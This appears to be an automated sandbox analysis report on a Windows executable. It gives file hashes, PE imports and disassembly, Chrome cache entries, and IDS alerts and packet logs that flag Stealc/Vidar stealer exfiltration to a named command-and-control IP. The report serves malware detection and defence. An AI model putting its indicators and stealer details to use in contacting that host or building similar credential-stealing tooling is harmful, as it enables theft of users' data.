                                                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\json[1].json

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe
                                                                                    File Type:JSON data
                                                                                    Category:dropped
                                                                                    Size (bytes):1787
                                                                                    Entropy (8bit):5.377951894643643
                                                                                    Encrypted:false
                                                                                    SSDEEP:48:SfNaoCmgTEC7/fNaoCNWCpfNaoCFCyfNaoCxJk0UrU0U8Cxr:6NnCxTEC7XNnCNWCFNnCFCaNnCxJk0Uc
                                                                                    MD5:D5673180329FF182CA6D212D342CE61A
                                                                                    SHA1:CA17CEEBC847998B1550D070795F103D19A74D26
                                                                                    SHA-256:A1CA2FA3C90B4E501D2FF5F1C74C45796D59B4304F3ED1E1109D09073885814D
                                                                                    SHA-512:4056D19E6AE5097E9089C04974272714175894AC5222BE68FF0AD33DE4D7003AF155B0DA5A4EA15CF762944D26625E912CE17F9DA05A949824067BE4D43C877A
                                                                                    Malicious:false
                                                                                    Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/6B83B90D0D9B23DFF46452D4029AF320",.. "id": "6B83B90D0D9B23DFF46452D4029AF320",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/6B83B90D0D9B23DFF46452D4029AF320"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/E937B3313793EA5AE55E2EC6990AAB9D",.. "id": "E937B3313793EA5AE55E2EC6990AAB9D",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/E937B3313793EA5AE55E2EC6990AAB9D"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtoo

                                                                                    Chrome Cache Entry: 60

                                                                                    Download File
                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    File Type:ASCII text
                                                                                    Category:downloaded
                                                                                    Size (bytes):29
                                                                                    Entropy (8bit):3.9353986674667634
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:VQAOx/1n:VQAOd1n
                                                                                    MD5:6FED308183D5DFC421602548615204AF
                                                                                    SHA1:0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
                                                                                    SHA-256:4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
                                                                                    SHA-512:A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
                                                                                    Malicious:false
                                                                                    URL:https://www.google.com/async/newtab_promos
                                                                                    Preview:)]}'.{"update":{"promos":{}}}

                                                                                    Chrome Cache Entry: 61

                                                                                    Download File
                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    File Type:ASCII text, with very long lines (65531)
                                                                                    Category:downloaded
                                                                                    Size (bytes):132165
                                                                                    Entropy (8bit):5.437083853480072
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:M+GkpdApMNrBdM1rG5wF2zHWDEvhW/6z6x0zW:j3dAcddM1rG5wF2zHkEvhu46AW
                                                                                    MD5:6AC6EF0E3E7096D305D09F43300EEA07
                                                                                    SHA1:D433F6B8C086C1364C5D61381B6E56B4D36AC19F
                                                                                    SHA-256:2D4A9A41C51CA7FD3F0686821CE5021D376C2F77A47589F17440E8BF36E0EA15
                                                                                    SHA-512:A196CEECD7188F74347147275F36281818FBE24402A0262A678711CC480D2FF97063042CB28E90F12EF3D42B211C40E3E9334FA15B80B49E78981C70941C4C73
                                                                                    Malicious:false
                                                                                    URL:https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
                                                                                    Preview:)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Fa gb_2d gb_Pe gb_rd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Qd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_ld gb_pd gb_Hd gb_md\"\u003e\u003cdiv class\u003d\"gb_xd gb_sd\"\u003e\u003cdiv class\u003d\"gb_Kc gb_R\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Kc gb_Nc gb_R\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.

                                                                                    Chrome Cache Entry: 62

                                                                                    Download File
                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    File Type:ASCII text, with very long lines (922)
                                                                                    Category:downloaded
                                                                                    Size (bytes):927
                                                                                    Entropy (8bit):5.161385282826881
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:BXuAvzpAbCVl3RLBHslgT1d1uawBATLjuyluFN2t2t2t2t2th2tomffffffo:hvBVBRLKlgJXwBAnjuouFNYYYYYhYom4
                                                                                    MD5:4A9EC26091ACF0C6D975BDCAE353FA9B
                                                                                    SHA1:C7F773C452207D8CBA328549B0822335105C41B6
                                                                                    SHA-256:037B86BE70774A7F2791E0559B70CF06B1DBFCE6D79C88318C98449620E56F88
                                                                                    SHA-512:9B79FBEA5F8EC8043308469B49AD891572A0ED387B1AAB57505EF5327FC8CBB0FF92F1449867796189D808A69C283EE25B16F9A4263C6B3E0B6C64E7EFEED22C
                                                                                    Malicious:false
                                                                                    URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE
                                                                                    Preview:)]}'.["",["cw powerpuff girls live action trailer","stock market","minnesota high school hockey tournament","supreme court clean water act raw sewage","blood moon total lunar eclipse","ps5 limited edition controller","polar vortex collapse weather forecast","brick by brick jordan 4 raffle"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChoIkk4SFQoRVHJlbmRpbmcgc2VhcmNoZXMoCg\u003d\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002}],"google:suggesteventid":"1085334600210115308","google:suggestrelevance":[1254,1253,1252,1251,1250,601,600,550],"google:suggestsubtypes":[[3,143,362,308],[3,143,362,308],[3,143,362,308],[3,143,362,308],[3,143,362,308],[3,143,362,308,10],[3,143,362,308],[3,143,362,308]],"google:suggesttype":["QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY"]}]

                                                                                    Static File Info

                                                                                    General

                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                    Entropy (8bit):6.38282640992862
                                                                                    TrID:
                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                    File name:SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe
                                                                                    File size:140'800 bytes
                                                                                    MD5:da8846245fb9ec49a3223f7731236c7f
                                                                                    SHA1:73189b12b69dc840ab373861748ba7fa0f4859c9
                                                                                    SHA256:a54c3a619f8fc2f69b09098a45f880c352de39c568235de9f988fce9bf8c6f48
                                                                                    SHA512:df420d91375d0cbd26ca16bfb8e7cf9a0076790719a5130fa52af6a319c50d307bb3b355521fdd0dd5ce19a684b53add02ebad6becad179b88447bedd67cf203
                                                                                    SSDEEP:3072:aVvH8RuVrLyEj/S2CUGACcceJd/klDHa/R8mxu3s8Ql5u:KH8RuRLlzgUd6a/Asll5u
                                                                                    TLSH:7AD38C117282A0B1E8472B741E7F77BDEEB04E256B908ACBE3C47D598F1A1E52371C19
                                                                                    File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L......g.....................`.......r............@.........................................................................h...@..

                                                                                    File Icon

                                                                                    Icon Hash:90cececece8e8eb0

                                                                                    Static PE Info

                                                                                    General

                                                                                    Entrypoint:0x417210
                                                                                    Entrypoint Section:.text
                                                                                    Digitally signed:false
                                                                                    Imagebase:0x400000
                                                                                    Subsystem:windows gui
                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                    DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                    Time Stamp:0x67BBFA01 [Mon Feb 24 04:48:01 2025 UTC]
                                                                                    TLS Callbacks:
                                                                                    CLR (.Net) Version:
                                                                                    OS Version Major:6
                                                                                    OS Version Minor:0
                                                                                    File Version Major:6
                                                                                    File Version Minor:0
                                                                                    Subsystem Version Major:6
                                                                                    Subsystem Version Minor:0
                                                                                    Import Hash:351fbae162a7dacb0ecda3be35f09973

                                                                                    Entrypoint Preview

                                                                                    Instruction
                                                                                    push ebp
                                                                                    mov ebp, esp
                                                                                    push ebx
                                                                                    push edi
                                                                                    push esi
                                                                                    and esp, FFFFFFF8h
                                                                                    sub esp, 000007A0h
                                                                                    mov byte ptr [esp+0Ah], FFFFFFA0h
                                                                                    mov dword ptr [esp+0000008Ch], 00000082h
                                                                                    mov word ptr [esp+0Eh], 3159h
                                                                                    mov word ptr [esp+1Ah], F6BDh
                                                                                    mov dword ptr [esp+50h], 00000021h
                                                                                    mov byte ptr [esp+09h], 00000067h
                                                                                    mov word ptr [esp+0Ch], 003Fh
                                                                                    mov dword ptr [esp+20h], 00007CBFh
                                                                                    mov byte ptr [esp+08h], FFFFFFBFh
                                                                                    mov dword ptr [esp+00000088h], 0000349Eh
                                                                                    mov byte ptr [esp+0Bh], 0000003Dh
                                                                                    mov byte ptr [esp+1Dh], 0000006Dh
                                                                                    mov dword ptr [esp+00000084h], 0027D1EFh
                                                                                    mov word ptr [esp+32h], C02Eh
                                                                                    mov dword ptr [esp+14h], 00000000h
                                                                                    mov dword ptr [esp+10h], 00009CC3h
                                                                                    movzx eax, word ptr [esp+0Ch]
                                                                                    mov dword ptr [esp+3Ch], 00000000h
                                                                                    mov dword ptr [esp+38h], 00000041h
                                                                                    mov eax, dword ptr [esp+10h]
                                                                                    mov eax, dword ptr [esp+14h]
                                                                                    movzx eax, byte ptr [esp+0Bh]
                                                                                    movzx eax, word ptr [esp+1Ah]
                                                                                    movzx eax, ax
                                                                                    mov dword ptr [esp+48h], eax
                                                                                    movzx eax, word ptr [esp+0Eh]
                                                                                    mov word ptr [esp+30h], 6F05h
                                                                                    movzx eax, word ptr [esp+0Ch]
                                                                                    mov byte ptr [esp+1Ch], al

                                                                                    Data Directories

                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x1fe680x140.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x270000x1a8.rsrc
                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x280000xfd0.reloc
                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1ec880xc0.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x202780x2d0.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                    Sections

                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                    .text0x10000x1c0be0x1c200defcbd96cb4c6c83068e7f7c390edf24False0.5079340277777777data6.44296595590421IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                    .rdata0x1e0000x31c00x3200f2e241a3df6fc7246e58b3136fe99aedFalse0.4875data5.670190093687296IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                    .data0x220000x20600x1800c0b89365998bf62b8b25bc1f833d9b8aFalse0.0537109375data1.6185608611652704IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                    .00cfg0x250000x80x200e2cfc4a44f9b2582a627904a2e9bab5eFalse0.03125data0.06116285224115448IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                    .CRT0x260000x40x2004a38deb9a7535c4f23e9fd10dddc3678False0.03125data0.06116285224115448IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                    .rsrc0x270000x1a80x2007f6ac8de4c533dd84f236915ba981e52False0.482421875data4.183569951400347IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                    .reloc0x280000xfd00x1000513026ad18e96e0f11be050d9e9a9391False0.842529296875data6.701664548847092IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                    Resources

                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                    RT_MANIFEST0x270600x143XML 1.0 document, ASCII textEnglishUnited States0.628482972136223

                                                                                    Imports

                                                                                    DLLImport
                                                                                    msvcrt.dll??2@YAPAXI@Z, ??3@YAXPAX@Z, ??_U@YAPAXI@Z, ??_V@YAXPAX@Z, _splitpath, atexit, free, isupper, malloc, memchr, memcmp, memcpy, memmove, memset, rand, srand, strchr, strcpy, strcpy_s, strlen, strncpy, strstr, strtok_s
                                                                                    KERNEL32.dllCloseHandle, CopyFileA, CreateDirectoryA, CreateEventA, CreateFileA, CreateProcessA, CreateThread, CreateToolhelp32Snapshot, DeleteFileA, ExitProcess, ExpandEnvironmentStringsA, FileTimeToSystemTime, FindClose, FindFirstFileA, FindNextFileA, GetComputerNameA, GetComputerNameW, GetCurrentProcessId, GetDriveTypeA, GetEnvironmentVariableA, GetFileAttributesA, GetFileInformationByHandle, GetFileSize, GetFileSizeEx, GetFileType, GetFullPathNameA, GetLastError, GetLocalTime, GetLocaleInfoA, GetLogicalDriveStringsA, GetLogicalProcessorInformationEx, GetModuleFileNameA, GetProcAddress, GetProcessHeap, GetSystemInfo, GetSystemTime, GetTempPathW, GetTickCount, GetTimeZoneInformation, GetVolumeInformationA, GetWindowsDirectoryA, GetWindowsDirectoryW, GlobalAlloc, GlobalFree, GlobalLock, GlobalMemoryStatusEx, GlobalSize, HeapAlloc, HeapFree, K32GetModuleFileNameExA, LoadLibraryW, LocalAlloc, LocalFree, OpenEventA, OpenProcess, Process32First, Process32Next, RaiseException, ReadFile, ReadProcessMemory, SetFilePointer, Sleep, SystemTimeToFileTime, TerminateProcess, VirtualQueryEx, WaitForSingleObject, WriteFile, lstrcatA, lstrcpyA, lstrlenA, lstrlenW
                                                                                    ADVAPI32.dllGetCurrentHwProfileA, GetUserNameA, GetUserNameW, RegCloseKey, RegEnumKeyExA, RegGetValueA, RegOpenKeyExA, RegQueryValueExA
                                                                                    api-ms-win-crt-runtime-l1-1-0.dll_invalid_parameter_noinfo_noreturn
                                                                                    USER32.dllCharToOemA, CloseDesktop, CloseWindow, CreateDesktopA, EnumDisplayDevicesA, GetDC, GetDesktopWindow, GetKeyboardLayoutList, GetWindowRect, OpenDesktopA, ReleaseDC, wsprintfA, wsprintfW
                                                                                    api-ms-win-crt-stdio-l1-1-0.dll__stdio_common_vsnprintf_s, __stdio_common_vsprintf
                                                                                    GDI32.dllBitBlt, CreateCompatibleBitmap, CreateCompatibleDC, CreateDCA, DeleteObject, GetDeviceCaps, SelectObject
                                                                                    SHELL32.dllSHFileOperationA, SHGetFolderPathA, ShellExecuteExA, ShellExecuteExW
                                                                                    ole32.dllCreateStreamOnHGlobal, GetHGlobalFromStream
                                                                                    WS2_32.dllWSACleanup, WSAStartup, closesocket, connect, freeaddrinfo, getaddrinfo, htons, recv, send, socket
                                                                                    SHLWAPI.dllPathFileExistsA, PathMatchSpecA, StrStrA
                                                                                    CRYPT32.dllCryptBinaryToStringA, CryptUnprotectData
                                                                                    WININET.dllHttpOpenRequestA, HttpQueryInfoA, HttpSendRequestA, InternetCloseHandle, InternetConnectA, InternetCrackUrlA, InternetOpenA, InternetOpenUrlA, InternetReadFile, InternetSetOptionA
                                                                                    bcrypt.dllBCryptCloseAlgorithmProvider, BCryptDecrypt, BCryptDestroyKey, BCryptGenerateSymmetricKey, BCryptOpenAlgorithmProvider, BCryptSetProperty
                                                                                    dbghelp.dllSymMatchString

                                                                                    Possible Origin

                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                    EnglishUnited States

                                                                                    Network Behavior

                                                                                    Suricata IDS Alerts

                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                    2025-03-07T20:45:20.652661+01002859378ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M21192.168.2.44971795.217.27.252443TCP
                                                                                    2025-03-07T20:45:23.627833+01002049087ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M11192.168.2.44971895.217.27.252443TCP
                                                                                    2025-03-07T20:45:27.226476+01002044247ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config195.217.27.252443192.168.2.449722TCP
                                                                                    2025-03-07T20:45:30.215995+01002051831ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1195.217.27.252443192.168.2.449724TCP
                                                                                    2025-03-07T20:45:33.381975+01002059331ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M21192.168.2.44972595.217.27.252443TCP
                                                                                    2025-03-07T20:45:34.789851+01002059331ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M21192.168.2.44972695.217.27.252443TCP
                                                                                    2025-03-07T20:45:35.821665+01002059331ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M21192.168.2.44972795.217.27.252443TCP
                                                                                    2025-03-07T20:45:35.821665+01002859636ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST)1192.168.2.44972795.217.27.252443TCP
                                                                                    2025-03-07T20:45:37.626947+01002059331ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M21192.168.2.44972895.217.27.252443TCP
                                                                                    2025-03-07T20:45:37.626947+01002859636ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST)1192.168.2.44972895.217.27.252443TCP
                                                                                    2025-03-07T20:45:41.030527+01002059331ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M21192.168.2.44972995.217.27.252443TCP
                                                                                    2025-03-07T20:45:41.030527+01002859636ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST)1192.168.2.44972995.217.27.252443TCP
                                                                                    2025-03-07T20:45:50.360247+01002059331ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M21192.168.2.44975195.217.27.252443TCP
                                                                                    2025-03-07T20:45:51.360815+01002059331ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M21192.168.2.44975295.217.27.252443TCP
                                                                                    2025-03-07T20:45:54.019261+01002059331ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M21192.168.2.44975395.217.27.252443TCP
                                                                                    2025-03-07T20:45:54.019261+01002859636ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST)1192.168.2.44975395.217.27.252443TCP
                                                                                    2025-03-07T20:45:54.707446+01002059331ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M21192.168.2.44975495.217.27.252443TCP
                                                                                    2025-03-07T20:45:54.707446+01002859636ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST)1192.168.2.44975495.217.27.252443TCP
                                                                                    2025-03-07T20:45:58.166445+01002059331ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M21192.168.2.44975595.217.27.252443TCP
                                                                                    2025-03-07T20:45:58.166445+01002859636ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST)1192.168.2.44975595.217.27.252443TCP
                                                                                    2025-03-07T20:45:59.643697+01002059331ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M21192.168.2.44975695.217.27.252443TCP
                                                                                    2025-03-07T20:45:59.643697+01002859636ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST)1192.168.2.44975695.217.27.252443TCP
                                                                                    2025-03-07T20:46:02.437370+01002059331ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M21192.168.2.44975795.217.27.252443TCP
                                                                                    2025-03-07T20:46:02.437370+01002859636ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST)1192.168.2.44975795.217.27.252443TCP
                                                                                    2025-03-07T20:46:04.764894+01002059331ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M21192.168.2.44975895.217.27.252443TCP
                                                                                    2025-03-07T20:46:04.764894+01002859636ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST)1192.168.2.44975895.217.27.252443TCP
                                                                                    2025-03-07T20:46:15.084949+01002059331ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M21192.168.2.44976195.217.27.252443TCP
                                                                                    2025-03-07T20:46:18.248973+01002059331ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M21192.168.2.44976295.217.27.252443TCP

                                                                                    Network Port Distribution

                                                                                    TCP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Mar 7, 2025 20:45:06.305565119 CET49671443192.168.2.4204.79.197.203
                                                                                    Mar 7, 2025 20:45:06.617657900 CET49671443192.168.2.4204.79.197.203
                                                                                    Mar 7, 2025 20:45:07.226982117 CET49671443192.168.2.4204.79.197.203
                                                                                    Mar 7, 2025 20:45:08.430160046 CET49671443192.168.2.4204.79.197.203
                                                                                    Mar 7, 2025 20:45:09.348328114 CET49710443192.168.2.4149.154.167.99
                                                                                    Mar 7, 2025 20:45:09.348377943 CET44349710149.154.167.99192.168.2.4
                                                                                    Mar 7, 2025 20:45:09.348454952 CET49710443192.168.2.4149.154.167.99
                                                                                    Mar 7, 2025 20:45:09.362808943 CET49710443192.168.2.4149.154.167.99
                                                                                    Mar 7, 2025 20:45:09.362837076 CET44349710149.154.167.99192.168.2.4
                                                                                    Mar 7, 2025 20:45:10.836411953 CET49671443192.168.2.4204.79.197.203
                                                                                    Mar 7, 2025 20:45:11.438555956 CET44349710149.154.167.99192.168.2.4
                                                                                    Mar 7, 2025 20:45:11.438632965 CET49710443192.168.2.4149.154.167.99
                                                                                    Mar 7, 2025 20:45:11.503335953 CET49710443192.168.2.4149.154.167.99
                                                                                    Mar 7, 2025 20:45:11.503360987 CET44349710149.154.167.99192.168.2.4
                                                                                    Mar 7, 2025 20:45:11.503705978 CET44349710149.154.167.99192.168.2.4
                                                                                    Mar 7, 2025 20:45:11.503757954 CET49710443192.168.2.4149.154.167.99
                                                                                    Mar 7, 2025 20:45:11.507703066 CET49710443192.168.2.4149.154.167.99
                                                                                    Mar 7, 2025 20:45:11.548321009 CET44349710149.154.167.99192.168.2.4
                                                                                    Mar 7, 2025 20:45:13.754615068 CET44349710149.154.167.99192.168.2.4
                                                                                    Mar 7, 2025 20:45:13.754646063 CET44349710149.154.167.99192.168.2.4
                                                                                    Mar 7, 2025 20:45:13.754686117 CET44349710149.154.167.99192.168.2.4
                                                                                    Mar 7, 2025 20:45:13.754760981 CET44349710149.154.167.99192.168.2.4
                                                                                    Mar 7, 2025 20:45:13.754779100 CET49710443192.168.2.4149.154.167.99
                                                                                    Mar 7, 2025 20:45:13.754812002 CET49710443192.168.2.4149.154.167.99
                                                                                    Mar 7, 2025 20:45:13.844985008 CET49710443192.168.2.4149.154.167.99
                                                                                    Mar 7, 2025 20:45:13.845017910 CET44349710149.154.167.99192.168.2.4
                                                                                    Mar 7, 2025 20:45:13.939021111 CET49714443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:45:13.939050913 CET4434971495.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:45:13.939126968 CET49714443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:45:13.939450979 CET49714443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:45:13.939464092 CET4434971495.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:45:15.071229935 CET49678443192.168.2.420.189.173.27
                                                                                    Mar 7, 2025 20:45:15.383261919 CET49678443192.168.2.420.189.173.27
                                                                                    Mar 7, 2025 20:45:15.648875952 CET49671443192.168.2.4204.79.197.203
                                                                                    Mar 7, 2025 20:45:15.992619038 CET49678443192.168.2.420.189.173.27
                                                                                    Mar 7, 2025 20:45:16.302694082 CET4434971495.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:45:16.302768946 CET49714443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:45:16.464096069 CET49714443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:45:16.464127064 CET4434971495.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:45:16.464484930 CET4434971495.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:45:16.464539051 CET49714443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:45:16.466078997 CET49714443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:45:16.512326956 CET4434971495.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:45:17.198198080 CET49678443192.168.2.420.189.173.27
                                                                                    Mar 7, 2025 20:45:17.341211081 CET4434971495.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:45:17.341293097 CET49714443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:45:17.341334105 CET4434971495.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:45:17.341520071 CET49714443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:45:17.344166994 CET49714443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:45:17.344275951 CET4434971495.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:45:17.344364882 CET49714443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:45:17.356008053 CET49717443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:45:17.356051922 CET4434971795.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:45:17.356112003 CET49717443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:45:17.356365919 CET49717443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:45:17.356376886 CET4434971795.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:45:19.298268080 CET4434971795.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:45:19.298378944 CET49717443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:45:19.302015066 CET49717443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:45:19.302050114 CET4434971795.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:45:19.302865028 CET4434971795.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:45:19.303244114 CET49717443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:45:19.303627014 CET49717443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:45:19.344329119 CET4434971795.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:45:19.602056026 CET49678443192.168.2.420.189.173.27
                                                                                    Mar 7, 2025 20:45:20.652632952 CET4434971795.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:45:20.652843952 CET49717443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:45:20.652873039 CET4434971795.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:45:20.652920961 CET49717443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:45:20.653047085 CET49717443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:45:20.653095961 CET4434971795.217.27.252192.168.2.4
